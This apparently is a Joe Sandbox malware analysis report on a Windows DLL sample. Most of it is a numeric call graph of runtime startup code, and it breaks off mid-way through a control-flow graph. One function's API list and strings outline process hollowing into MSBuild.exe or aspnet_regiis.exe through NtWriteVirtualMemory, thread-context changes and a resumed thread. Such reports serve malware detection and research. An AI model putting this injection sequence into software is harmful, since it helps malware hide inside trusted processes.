12951->12957 12958 68c04273 _free 14 API calls 12952->12958 12965 68c08887 12953->12965 12959 68c04273 _free 14 API calls 12955->12959 12993 68c08985 12956->12993 12957->12938 12962 68c06a9a 12958->12962 12959->12963 12961->12948 12962->12933 13005 68c06ac9 12963->13005 12964->12946 12966 68c08898 12965->12966 12992 68c08981 12965->12992 12967 68c04273 _free 14 API calls 12966->12967 12968 68c088a9 12966->12968 12967->12968 12969 68c04273 _free 14 API calls 12968->12969 12970 68c088bb 12968->12970 12969->12970 12971 68c088cd 12970->12971 12972 68c04273 _free 14 API calls 12970->12972 12973 68c088df 12971->12973 12975 68c04273 _free 14 API calls 12971->12975 12972->12971 12974 68c088f1 12973->12974 12976 68c04273 _free 14 API calls 12973->12976 12977 68c08903 12974->12977 12978 68c04273 _free 14 API calls 12974->12978 12975->12973 12976->12974 12979 68c08915 12977->12979 12980 68c04273 _free 14 API calls 12977->12980 12978->12977 12981 68c08927 12979->12981 12983 68c04273 _free 14 API calls 12979->12983 12980->12979 12982 68c08939 12981->12982 12984 68c04273 _free 14 API calls 12981->12984 12985 68c0894b 12982->12985 12986 68c04273 _free 14 API calls 12982->12986 12983->12981 12984->12982 12987 68c0895d 12985->12987 12988 68c04273 _free 14 API calls 12985->12988 12986->12985 12989 68c0896f 12987->12989 12990 68c04273 _free 14 API calls 12987->12990 12988->12987 12991 68c04273 _free 14 API calls 12989->12991 12989->12992 12990->12989 12991->12992 12992->12945 12994 68c08992 12993->12994 13004 68c089ea 12993->13004 12995 68c04273 _free 14 API calls 12994->12995 12997 68c089a2 12994->12997 12995->12997 12996 68c089b4 12998 68c089c6 12996->12998 13000 68c04273 _free 14 API calls 12996->13000 12997->12996 12999 68c04273 _free 14 API calls 12997->12999 13001 68c089d8 12998->13001 13002 68c04273 _free 14 API calls 12998->13002 12999->12996 13000->12998 13003 68c04273 _free 14 API calls 13001->13003 13001->13004 13002->13001 13003->13004 13004->12964 13006 68c06ad6 13005->13006 13010 68c06af5 13005->13010 13006->13010 13011 68c08a26 13006->13011 13009 68c04273 _free 14 API calls 13009->13010 13010->12948 13012 68c06aef 13011->13012 13013 68c08a37 13011->13013 13012->13009 13047 68c089ee 13013->13047 13016 68c089ee __fassign 14 API calls 13017 68c08a4a 13016->13017 13018 68c089ee __fassign 14 API calls 13017->13018 13019 68c08a55 13018->13019 13020 68c089ee __fassign 14 API calls 13019->13020 13021 68c08a60 13020->13021 13022 68c089ee __fassign 14 API calls 13021->13022 13023 68c08a6e 13022->13023 13024 68c04273 _free 14 API calls 13023->13024 13025 68c08a79 13024->13025 13026 68c04273 _free 14 API calls 13025->13026 13027 68c08a84 13026->13027 13028 68c04273 _free 14 API calls 13027->13028 13029 68c08a8f 13028->13029 13030 68c089ee __fassign 14 API calls 13029->13030 13031 68c08a9d 13030->13031 13032 68c089ee __fassign 14 API calls 13031->13032 13033 68c08aab 13032->13033 13034 68c089ee __fassign 14 API calls 13033->13034 13035 68c08abc 13034->13035 13036 68c089ee __fassign 14 API calls 13035->13036 13037 68c08aca 13036->13037 13038 68c089ee __fassign 14 API calls 13037->13038 13039 68c08ad8 13038->13039 13040 68c04273 _free 14 API calls 13039->13040 13041 68c08ae3 13040->13041 13042 68c04273 _free 14 API calls 13041->13042 13043 68c08aee 13042->13043 13044 68c04273 _free 14 API calls 13043->13044 13045 68c08af9 13044->13045 13046 68c04273 _free 14 API calls 13045->13046 13046->13012 13048 68c08a21 13047->13048 13049 68c08a11 13047->13049 13048->13016 13049->13048 13050 68c04273 _free 14 API calls 13049->13050 13050->13049 13051->12936 13052 68c00dce 13053 68c00dd9 13052->13053 13054 68c00e0c 13052->13054 13056 68c00dfe 13053->13056 13057 68c00dde 13053->13057 13091 68c00f28 13054->13091 13064 68c00e21 13056->13064 13059 68c00de3 13057->13059 13060 68c00df4 13057->13060 13063 68c00de8 13059->13063 13078 68c013fa 13059->13078 13083 68c013db 13060->13083 13065 68c00e2d ___scrt_is_nonwritable_in_current_image 13064->13065 13118 68c0146b 13065->13118 13067 68c00e34 __DllMainCRTStartup@12 13068 68c00f20 13067->13068 13069 68c00e5b 13067->13069 13075 68c00e97 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 13067->13075 13137 68c0160a IsProcessorFeaturePresent 13068->13137 13129 68c013cd 13069->13129 13072 68c00f27 13073 68c00e6a __RTC_Initialize 13073->13075 13132 68c012eb InitializeSListHead 13073->13132 13075->13063 13076 68c00e78 13076->13075 13133 68c013a2 13076->13133 13231 68c0365e 13078->13231 13323 68c022b0 13083->13323 13086 68c013e4 13086->13063 13089 68c013f7 13089->13063 13090 68c022bb 21 API calls 13090->13086 13093 68c00f34 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 13091->13093 13092 68c00f3d 13092->13063 13093->13092 13094 68c00fd0 13093->13094 13095 68c00f65 13093->13095 13096 68c0160a __DllMainCRTStartup@12 4 API calls 13094->13096 13343 68c0143b 13095->13343 13100 68c00fd7 ___scrt_is_nonwritable_in_current_image 13096->13100 13098 68c00f6a 13352 68c012f7 13098->13352 13102 68c0100d dllmain_raw 13100->13102 13103 68c01008 13100->13103 13115 68c00ff3 13100->13115 13101 68c00f6f __RTC_Initialize __DllMainCRTStartup@12 13355 68c015dc 13101->13355 13104 68c01027 dllmain_crt_dispatch 13102->13104 13102->13115 13364 68bffcb0 13103->13364 13104->13103 13104->13115 13110 68c01079 13111 68c01082 dllmain_crt_dispatch 13110->13111 13110->13115 13112 68c01095 dllmain_raw 13111->13112 13111->13115 13112->13115 13113 68bffcb0 __DllMainCRTStartup@12 5 API calls 13114 68c01060 13113->13114 13116 68c00f28 __DllMainCRTStartup@12 79 API calls 13114->13116 13115->13063 13117 68c0106e dllmain_raw 13116->13117 13117->13110 13119 68c01474 13118->13119 13141 68c017d8 IsProcessorFeaturePresent 13119->13141 13123 68c01485 13124 68c01489 13123->13124 13151 68c03641 13123->13151 13124->13067 13127 68c014a0 13127->13067 13225 68c014a4 13129->13225 13131 68c013d4 13131->13073 13132->13076 13134 68c013a7 ___scrt_release_startup_lock 13133->13134 13135 68c017d8 IsProcessorFeaturePresent 13134->13135 13136 68c013b0 13134->13136 13135->13136 13136->13075 13138 68c01620 __DllMainCRTStartup@12 13137->13138 13139 68c016cb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13138->13139 13140 68c01716 __DllMainCRTStartup@12 13139->13140 13140->13072 13142 68c01480 13141->13142 13143 68c02291 13142->13143 13160 68c026c7 13143->13160 13146 68c0229a 13146->13123 13148 68c022a2 13149 68c022ad 13148->13149 13174 68c02703 13148->13174 13149->13123 13216 68c05d8d 13151->13216 13154 68c022c6 13155 68c022d9 13154->13155 13156 68c022cf 13154->13156 13155->13124 13157 68c026ac ___vcrt_uninitialize_ptd 6 API calls 13156->13157 13158 68c022d4 13157->13158 13159 68c02703 ___vcrt_uninitialize_locks DeleteCriticalSection 13158->13159 13159->13155 13161 68c026d0 13160->13161 13163 68c026f9 13161->13163 13164 68c02296 13161->13164 13178 68c02935 13161->13178 13165 68c02703 ___vcrt_uninitialize_locks DeleteCriticalSection 13163->13165 13164->13146 13166 68c02679 13164->13166 13165->13164 13197 68c02846 13166->13197 13169 68c0268e 13169->13148 13172 68c026a9 13172->13148 13175 68c0272d 13174->13175 13176 68c0270e 13174->13176 13175->13146 13177 68c02718 DeleteCriticalSection 13176->13177 13177->13175 13177->13177 13183 68c027fd 13178->13183 13181 68c02958 13181->13161 13182 68c0296d InitializeCriticalSectionAndSpinCount 13182->13181 13184 68c02838 13183->13184 13185 68c02815 13183->13185 13184->13181 13184->13182 13185->13184 13189 68c02763 13185->13189 13188 68c0282a GetProcAddress 13188->13184 13195 68c0276f ___vcrt_FlsFree 13189->13195 13190 68c027e3 13190->13184 13190->13188 13191 68c02785 LoadLibraryExW 13192 68c027a3 GetLastError 13191->13192 13193 68c027ea 13191->13193 13192->13195 13193->13190 13194 68c027f2 FreeLibrary 13193->13194 13194->13190 13195->13190 13195->13191 13196 68c027c5 LoadLibraryExW 13195->13196 13196->13193 13196->13195 13198 68c027fd ___vcrt_FlsFree 5 API calls 13197->13198 13199 68c02860 13198->13199 13200 68c02879 TlsAlloc 13199->13200 13201 68c02683 13199->13201 13201->13169 13202 68c028f7 13201->13202 13203 68c027fd ___vcrt_FlsFree 5 API calls 13202->13203 13204 68c02911 13203->13204 13205 68c0292c TlsSetValue 13204->13205 13206 68c0269c 13204->13206 13205->13206 13206->13172 13207 68c026ac 13206->13207 13208 68c026bc 13207->13208 13209 68c026b6 13207->13209 13208->13169 13211 68c02881 13209->13211 13212 68c027fd ___vcrt_FlsFree 5 API calls 13211->13212 13213 68c0289b 13212->13213 13214 68c028b3 TlsFree 13213->13214 13215 68c028a7 13213->13215 13214->13215 13215->13208 13217 68c05d9d 13216->13217 13218 68c01492 13216->13218 13217->13218 13220 68c05c4d 13217->13220 13218->13127 13218->13154 13224 68c05c54 13220->13224 13221 68c05c97 GetStdHandle 13221->13224 13222 68c05cfd 13222->13217 13223 68c05caa GetFileType 13223->13224 13224->13221 13224->13222 13224->13223 13226 68c014b0 13225->13226 13227 68c014b4 13225->13227 13226->13131 13228 68c0160a __DllMainCRTStartup@12 4 API calls 13227->13228 13230 68c014c1 ___scrt_release_startup_lock 13227->13230 13229 68c0152a 13228->13229 13230->13131 13237 68c03c4b 13231->13237 13234 68c022bb 13303 68c025a3 13234->13303 13238 68c03c55 13237->13238 13239 68c013ff 13237->13239 13240 68c059c1 _free 6 API calls 13238->13240 13239->13234 13241 68c03c5c 13240->13241 13241->13239 13242 68c05a00 _free 6 API calls 13241->13242 13243 68c03c6f 13242->13243 13245 68c03b12 13243->13245 13246 68c03b1d 13245->13246 13247 68c03b2d 13245->13247 13251 68c03b33 13246->13251 13247->13239 13250 68c04273 _free 14 API calls 13250->13247 13252 68c03b4e 13251->13252 13253 68c03b48 13251->13253 13255 68c04273 _free 14 API calls 13252->13255 13254 68c04273 _free 14 API calls 13253->13254 13254->13252 13256 68c03b5a 13255->13256 13257 68c04273 _free 14 API calls 13256->13257 13258 68c03b65 13257->13258 13259 68c04273 _free 14 API calls 13258->13259 13260 68c03b70 13259->13260 13261 68c04273 _free 14 API calls 13260->13261 13262 68c03b7b 13261->13262 13263 68c04273 _free 14 API calls 13262->13263 13264 68c03b86 13263->13264 13265 68c04273 _free 14 API calls 13264->13265 13266 68c03b91 13265->13266 13267 68c04273 _free 14 API calls 13266->13267 13268 68c03b9c 13267->13268 13269 68c04273 _free 14 API calls 13268->13269 13270 68c03ba7 13269->13270 13271 68c04273 _free 14 API calls 13270->13271 13272 68c03bb5 13271->13272 13277 68c0395f 13272->13277 13278 68c0396b ___scrt_is_nonwritable_in_current_image 13277->13278 13293 68c03f0a EnterCriticalSection 13278->13293 13281 68c03975 13283 68c04273 _free 14 API calls 13281->13283 13284 68c0399f 13281->13284 13283->13284 13294 68c039be 13284->13294 13285 68c039ca 13286 68c039d6 ___scrt_is_nonwritable_in_current_image 13285->13286 13298 68c03f0a EnterCriticalSection 13286->13298 13288 68c039e0 13289 68c03c00 _free 14 API calls 13288->13289 13290 68c039f3 13289->13290 13299 68c03a13 13290->13299 13293->13281 13297 68c03f52 LeaveCriticalSection 13294->13297 13296 68c039ac 13296->13285 13297->13296 13298->13288 13302 68c03f52 LeaveCriticalSection 13299->13302 13301 68c03a01 13301->13250 13302->13301 13304 68c025b0 13303->13304 13310 68c01404 13303->13310 13305 68c025be 13304->13305 13311 68c028bc 13304->13311 13307 68c028f7 ___vcrt_FlsSetValue 6 API calls 13305->13307 13308 68c025ce 13307->13308 13316 68c02587 13308->13316 13310->13063 13312 68c027fd ___vcrt_FlsFree 5 API calls 13311->13312 13313 68c028d6 13312->13313 13314 68c028e2 13313->13314 13315 68c028ee TlsGetValue 13313->13315 13314->13305 13315->13314 13317 68c02591 13316->13317 13318 68c0259e 13316->13318 13317->13318 13320 68c036e4 13317->13320 13318->13310 13321 68c04273 _free 14 API calls 13320->13321 13322 68c036fc 13321->13322 13322->13318 13329 68c025e7 13323->13329 13325 68c013e0 13325->13086 13326 68c03653 13325->13326 13327 68c03dce _free 14 API calls 13326->13327 13328 68c013ec 13327->13328 13328->13089 13328->13090 13330 68c025f0 13329->13330 13331 68c025f3 GetLastError 13329->13331 13330->13325 13332 68c028bc ___vcrt_FlsGetValue 6 API calls 13331->13332 13333 68c02608 13332->13333 13334 68c0266d SetLastError 13333->13334 13335 68c028f7 ___vcrt_FlsSetValue 6 API calls 13333->13335 13342 68c02627 13333->13342 13334->13325 13336 68c02621 13335->13336 13337 68c02649 13336->13337 13338 68c028f7 ___vcrt_FlsSetValue 6 API calls 13336->13338 13336->13342 13339 68c028f7 ___vcrt_FlsSetValue 6 API calls 13337->13339 13340 68c0265d 13337->13340 13338->13337 13339->13340 13341 68c036e4 ___std_type_info_destroy_list 14 API calls 13340->13341 13341->13342 13342->13334 13344 68c01440 ___scrt_release_startup_lock 13343->13344 13345 68c01450 __DllMainCRTStartup@12 13344->13345 13346 68c01444 13344->13346 13349 68c0145d 13345->13349 13371 68c02d31 13345->13371 13368 68c034ce 13346->13368 13349->13098 13438 68c0226e InterlockedFlushSList 13352->13438 13356 68c015e8 13355->13356 13358 68c00f8e 13356->13358 13442 68c03666 13356->13442 13361 68c00fca 13358->13361 13359 68c015f6 13360 68c022c6 ___scrt_uninitialize_crt 7 API calls 13359->13360 13360->13358 13555 68c0145e 13361->13555 13365 68bffd14 13364->13365 13572 68c00dc0 13365->13572 13367 68c00c4f 13367->13110 13367->13113 13382 68c03399 13368->13382 13372 68c02d3f 13371->13372 13381 68c02d50 13371->13381 13399 68c02dd7 GetModuleHandleW 13372->13399 13376 68c02d8a 13376->13098 13406 68c02bf7 13381->13406 13383 68c033a5 ___scrt_is_nonwritable_in_current_image 13382->13383 13390 68c03f0a EnterCriticalSection 13383->13390 13385 68c033b3 13391 68c033f4 13385->13391 13390->13385 13392 68c03413 13391->13392 13393 68c033c0 13391->13393 13392->13393 13394 68c04273 _free 14 API calls 13392->13394 13395 68c033e8 13393->13395 13394->13393 13398 68c03f52 LeaveCriticalSection 13395->13398 13397 68c0144e 13397->13098 13398->13397 13400 68c02d44 13399->13400 13400->13381 13401 68c02e1a GetModuleHandleExW 13400->13401 13402 68c02e39 GetProcAddress 13401->13402 13403 68c02e4e 13401->13403 13402->13403 13404 68c02e62 FreeLibrary 13403->13404 13405 68c02e6b 13403->13405 13404->13405 13405->13381 13407 68c02c03 ___scrt_is_nonwritable_in_current_image 13406->13407 13422 68c03f0a EnterCriticalSection 13407->13422 13409 68c02c0d 13423 68c02c44 13409->13423 13411 68c02c1a 13427 68c02c38 13411->13427 13414 68c02d95 13431 68c03f69 GetPEB 13414->13431 13417 68c02dc4 13420 68c02e1a __DllMainCRTStartup@12 3 API calls 13417->13420 13418 68c02da4 GetPEB 13418->13417 13419 68c02db4 GetCurrentProcess TerminateProcess 13418->13419 13419->13417 13421 68c02dcc ExitProcess 13420->13421 13422->13409 13424 68c02c50 ___scrt_is_nonwritable_in_current_image 13423->13424 13425 68c02cb1 __DllMainCRTStartup@12 13424->13425 13426 68c034ce __DllMainCRTStartup@12 14 API calls 13424->13426 13425->13411 13426->13425 13430 68c03f52 LeaveCriticalSection 13427->13430 13429 68c02c26 13429->13376 13429->13414 13430->13429 13432 68c02d9f 13431->13432 13433 68c03f83 13431->13433 13432->13417 13432->13418 13435 68c058e4 13433->13435 13436 68c05861 _free 5 API calls 13435->13436 13437 68c05900 13436->13437 13437->13432 13439 68c01301 13438->13439 13440 68c0227e 13438->13440 13439->13101 13440->13439 13441 68c036e4 ___std_type_info_destroy_list 14 API calls 13440->13441 13441->13440 13443 68c03671 13442->13443 13444 68c03683 ___scrt_uninitialize_crt 13442->13444 13445 68c0367f 13443->13445 13447 68c064a7 13443->13447 13444->13359 13445->13359 13450 68c06355 13447->13450 13453 68c062a9 13450->13453 13454 68c062b5 ___scrt_is_nonwritable_in_current_image 13453->13454 13461 68c03f0a EnterCriticalSection 13454->13461 13456 68c0632b 13470 68c06349 13456->13470 13460 68c062bf ___scrt_uninitialize_crt 13460->13456 13462 68c0621d 13460->13462 13461->13460 13463 68c06229 ___scrt_is_nonwritable_in_current_image 13462->13463 13473 68c065c4 EnterCriticalSection 13463->13473 13465 68c06233 ___scrt_uninitialize_crt 13466 68c0626c 13465->13466 13474 68c0645f 13465->13474 13484 68c0629d 13466->13484 13554 68c03f52 LeaveCriticalSection 13470->13554 13472 68c06337 13472->13445 13473->13465 13475 68c06475 13474->13475 13476 68c0646c 13474->13476 13487 68c063fa 13475->13487 13477 68c06355 ___scrt_uninitialize_crt 66 API calls 13476->13477 13483 68c06472 13477->13483 13481 68c06491 13500 68c07ac2 13481->13500 13483->13466 13553 68c065d8 LeaveCriticalSection 13484->13553 13486 68c0628b 13486->13460 13488 68c06412 13487->13488 13492 68c06437 13487->13492 13489 68c067f0 ___scrt_uninitialize_crt 25 API calls 13488->13489 13488->13492 13490 68c06430 13489->13490 13511 68c082ba 13490->13511 13492->13483 13493 68c067f0 13492->13493 13494 68c06811 13493->13494 13495 68c067fc 13493->13495 13494->13481 13496 68c04203 _free 14 API calls 13495->13496 13497 68c06801 13496->13497 13536 68c04146 13497->13536 13501 68c07ae0 13500->13501 13502 68c07ad3 13500->13502 13504 68c07b29 13501->13504 13506 68c07b07 13501->13506 13503 68c04203 _free 14 API calls 13502->13503 13509 68c07ad8 13503->13509 13505 68c04203 _free 14 API calls 13504->13505 13507 68c07b2e 13505->13507 13539 68c07a20 13506->13539 13508 68c04146 __fassign 25 API calls 13507->13508 13508->13509 13509->13483 13512 68c082c6 ___scrt_is_nonwritable_in_current_image 13511->13512 13513 68c082e6 13512->13513 13514 68c082ce 13512->13514 13515 68c08381 13513->13515 13520 68c08318 13513->13520 13516 68c041f0 __dosmaperr 14 API calls 13514->13516 13517 68c041f0 __dosmaperr 14 API calls 13515->13517 13518 68c082d3 13516->13518 13519 68c08386 13517->13519 13521 68c04203 _free 14 API calls 13518->13521 13522 68c04203 _free 14 API calls 13519->13522 13523 68c078df ___scrt_uninitialize_crt EnterCriticalSection 13520->13523 13535 68c082db 13521->13535 13524 68c0838e 13522->13524 13525 68c0831e 13523->13525 13526 68c04146 __fassign 25 API calls 13524->13526 13527 68c0833a 13525->13527 13528 68c0834f 13525->13528 13526->13535 13529 68c04203 _free 14 API calls 13527->13529 13530 68c083ac ___scrt_uninitialize_crt 60 API calls 13528->13530 13531 68c0833f 13529->13531 13532 68c0834a 13530->13532 13533 68c041f0 __dosmaperr 14 API calls 13531->13533 13534 68c08379 ___scrt_uninitialize_crt LeaveCriticalSection 13532->13534 13533->13532 13534->13535 13535->13492 13537 68c040e2 __fassign 25 API calls 13536->13537 13538 68c04152 13537->13538 13538->13481 13540 68c07a2c ___scrt_is_nonwritable_in_current_image 13539->13540 13541 68c078df ___scrt_uninitialize_crt EnterCriticalSection 13540->13541 13542 68c07a3b 13541->13542 13543 68c07a82 13542->13543 13544 68c079b6 ___scrt_uninitialize_crt 25 API calls 13542->13544 13545 68c04203 _free 14 API calls 13543->13545 13546 68c07a67 FlushFileBuffers 13544->13546 13547 68c07a87 13545->13547 13546->13547 13548 68c07a73 13546->13548 13550 68c07ab6 ___scrt_uninitialize_crt LeaveCriticalSection 13547->13550 13549 68c041f0 __dosmaperr 14 API calls 13548->13549 13551 68c07a78 GetLastError 13549->13551 13552 68c07a9f 13550->13552 13551->13543 13552->13509 13553->13486 13554->13472 13560 68c03696 13555->13560 13558 68c026ac ___vcrt_uninitialize_ptd 6 API calls 13559 68c00fcf 13558->13559 13559->13092 13563 68c03eaf 13560->13563 13564 68c01465 13563->13564 13565 68c03eb9 13563->13565 13564->13558 13567 68c05982 13565->13567 13568 68c05861 _free 5 API calls 13567->13568 13569 68c0599e 13568->13569 13570 68c059a7 13569->13570 13571 68c059b9 TlsFree 13569->13571 13570->13564 13573 68c00dc8 13572->13573 13574 68c00dc9 IsProcessorFeaturePresent 13572->13574 13573->13367 13576 68c0116e 13574->13576 13579 68c01131 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13576->13579 13578 68c01251 13578->13367 13579->13578 13580 68c0110e 13581 68c01117 13580->13581 13582 68c0111c 13580->13582 13601 68c012a0 13581->13601 13586 68c00fd8 13582->13586 13587 68c00fe4 ___scrt_is_nonwritable_in_current_image 13586->13587 13588 68c0100d dllmain_raw 13587->13588 13589 68c01008 13587->13589 13598 68c00ff3 13587->13598 13590 68c01027 dllmain_crt_dispatch 13588->13590 13588->13598 13591 68bffcb0 __DllMainCRTStartup@12 5 API calls 13589->13591 13590->13589 13590->13598 13592 68c01048 13591->13592 13593 68c01079 13592->13593 13596 68bffcb0 __DllMainCRTStartup@12 5 API calls 13592->13596 13594 68c01082 dllmain_crt_dispatch 13593->13594 13593->13598 13595 68c01095 dllmain_raw 13594->13595 13594->13598 13595->13598 13597 68c01060 13596->13597 13599 68c00f28 __DllMainCRTStartup@12 84 API calls 13597->13599 13600 68c0106e dllmain_raw 13599->13600 13600->13593 13602 68c012b6 13601->13602 13604 68c012bf 13602->13604 13605 68c01253 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 13602->13605 13604->13582 13605->13604 13606 68bf88c0 13631 68bf891f __DllMainCRTStartup@12 13606->13631 13607 68bfe572 NtSetContextThread NtResumeThread 13607->13631 13608 68bfec6b GetConsoleWindow ShowWindow 13608->13631 13609 68bfb321 CreateProcessW 13609->13631 13610 68bfeb83 13611 68c00dc0 _ValidateLocalCookies 5 API calls 13610->13611 13612 68bfeb8d 13611->13612 13613 68bfeec5 NtGetContextThread 13613->13631 13614 68bfdf84 NtWriteVirtualMemory 13614->13631 13615 68bfd4d8 NtReadVirtualMemory 13615->13631 13616 68bff5ab CloseHandle 13616->13631 13617 68bfe352 NtCreateThreadEx 13617->13631 13618 68bff857 NtWriteVirtualMemory 13626 68bfee72 __DllMainCRTStartup@12 13618->13626 13621 68bfc1d9 NtWriteVirtualMemory 13621->13631 13622 68bffb38 CloseHandle 13622->13631 13623 68bfbaaa NtAllocateVirtualMemory 13623->13631 13624 68bfee0d VirtualAlloc 13624->13626 13625 68bfb697 NtGetContextThread 13625->13631 13626->13631 13627 68bfa7e7 GetConsoleWindow ShowWindow 13627->13631 13628 68bf1010 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13628->13631 13629 68bfe754 CloseHandle 13629->13631 13630 68bf1210 26 API calls 13630->13631 13631->13607 13631->13608 13631->13609 13631->13610 13631->13613 13631->13614 13631->13615 13631->13616 13631->13617 13631->13618 13631->13621 13631->13622 13631->13623 13631->13624 13631->13625 13631->13627 13631->13628 13631->13629 13631->13630 13632 68bfbbd4 NtWriteVirtualMemory 13631->13632 13633 68bff6d1 CreateProcessW 13631->13633 13634 68bfc53b NtWriteVirtualMemory 13631->13634 13635 68bfd753 NtWriteVirtualMemory 13631->13635 13636 68bfb011 VirtualAlloc 13631->13636 13637 68bffa22 NtWriteVirtualMemory 13631->13637 13638 68bfe8e4 CloseHandle 13631->13638 13639 68bf6e40 13631->13639 13632->13631 13633->13631 13634->13631 13635->13631 13636->13631 13637->13631 13638->13631 13643 68bf6e91 13639->13643 13640 68bf762b GetModuleHandleW 13650 68bf4810 13640->13650 13642 68bf78ca NtQueryInformationProcess 13642->13643 13643->13640 13643->13642 13644 68bf7f04 GetModuleHandleW 13643->13644 13647 68bf7dd6 13643->13647 13645 68bf4810 5 API calls 13644->13645 13646 68bf7662 __DllMainCRTStartup@12 13645->13646 13646->13643 13648 68c00dc0 _ValidateLocalCookies 5 API calls 13647->13648 13649 68bf7de6 NtAllocateVirtualMemory 13648->13649 13649->13631 13651 68bf4878 13650->13651 13652 68c00dc0 _ValidateLocalCookies 5 API calls 13651->13652 13653 68bf6b79 13652->13653 13653->13646
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Virtual$Memory$Write$CloseHandleWindow$CreateThread$AllocAllocateConsoleContextProcessShow$Read
                                                                                                                                                            • String ID: g]J$g]J$%N[$%N[$(z(a$+,^c$;E-F$;E-F$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$D_`$MZx$Yal$[3?H$kernel32.dll$ntdll.dll$6IX$6IX$AEf$AEf$En$En$Y$Y$f?}
                                                                                                                                                            • API String ID: 1378836336-1102560837
                                                                                                                                                            • Opcode ID: c93483a747a0a903e1929e0a76f955cc0e3bd9a64461c15aed8fecb1dffeb3f3
                                                                                                                                                            • Instruction ID: 0174e5c8171e607d1a90de9134a874a39cb25d9ac5297fa71679b0af5e0ec70d
                                                                                                                                                            • Opcode Fuzzy Hash: c93483a747a0a903e1929e0a76f955cc0e3bd9a64461c15aed8fecb1dffeb3f3
                                                                                                                                                            • Instruction Fuzzy Hash: E5D3C276A486518FCF04CE3CC9A47EAB7F2AB46315F4041A9D819DB394C636DA8ECF41
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Handle$File$CloseModule$CreateCurrentProcess$MappingProtectVirtual$InformationNameView
                                                                                                                                                            • String ID: (j$:MB$$@$mA=Q$mA=Q$}auZ$'<K$'<K
                                                                                                                                                            • API String ID: 1267590279-1113462242
                                                                                                                                                            • Opcode ID: 2e96dcd01c82c4788145141745dd4b65285c87b5274e9178a07bd9cfb7b60a3e
                                                                                                                                                            • Instruction ID: 3c6dc718d5fb3ccc20c056049d8d54ce315afe4458d2813bee4e6f4176526334
                                                                                                                                                            • Opcode Fuzzy Hash: 2e96dcd01c82c4788145141745dd4b65285c87b5274e9178a07bd9cfb7b60a3e
                                                                                                                                                            • Instruction Fuzzy Hash: 34530E76A502808FCF148E3CC9953DEBBE2EB47311F54856AD419DB396C63AC98ECB01

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1456 68bf6e40-68bf6e8a 1457 68bf6e91-68bf6e9c 1456->1457 1458 68bf750f-68bf7550 1457->1458 1459 68bf6ea2-68bf6eaf 1457->1459 1461 68bf7fda 1458->1461 1462 68bf7fa9-68bf7fb0 1459->1462 1463 68bf6eb5-68bf6ec2 1459->1463 1461->1457 1462->1461 1465 68bf6ec8-68bf6ed5 1463->1465 1466 68bf73c5-68bf7406 1463->1466 1468 68bf7dfd-68bf7e3e 1465->1468 1469 68bf6edb-68bf6ee8 1465->1469 1466->1461 1468->1461 1471 68bf6eee-68bf6efb 1469->1471 1472 68bf72c1-68bf72e2 1469->1472 1474 68bf7eec-68bf7ef3 1471->1474 1475 68bf6f01-68bf6f0e 1471->1475 1472->1461 1474->1461 1477 68bf7adf-68bf7b20 1475->1477 1478 68bf6f14-68bf6f21 1475->1478 1477->1461 1480 68bf6f27-68bf6f34 1478->1480 1481 68bf7ec5-68bf7ecc 1478->1481 1483 68bf6f3a-68bf6f47 1480->1483 1484 68bf72e7-68bf7355 1480->1484 1481->1461 1486 68bf6f4d-68bf6f5a 1483->1486 1487 68bf7b98-68bf7b9f 1483->1487 1484->1461 1489 68bf7ee0-68bf7ee7 1486->1489 1490 68bf6f60-68bf6f6d 1486->1490 1487->1461 1489->1461 1492 68bf740b-68bf748b 1490->1492 1493 68bf6f73-68bf6f80 1490->1493 1492->1461 1495 68bf6f86-68bf6f93 1493->1495 1496 68bf7503-68bf750a 1493->1496 1498 68bf6f99-68bf6fa6 1495->1498 1499 68bf7555-68bf75a7 1495->1499 1496->1461 1501 68bf6fac-68bf6fb9 1498->1501 1502 68bf75b8-68bf7626 1498->1502 1499->1461 1504 68bf6fbf-68bf6fcc 1501->1504 1505 68bf762b-68bf76fd GetModuleHandleW call 68bf4810 call 68c019f0 1501->1505 1502->1461 1508 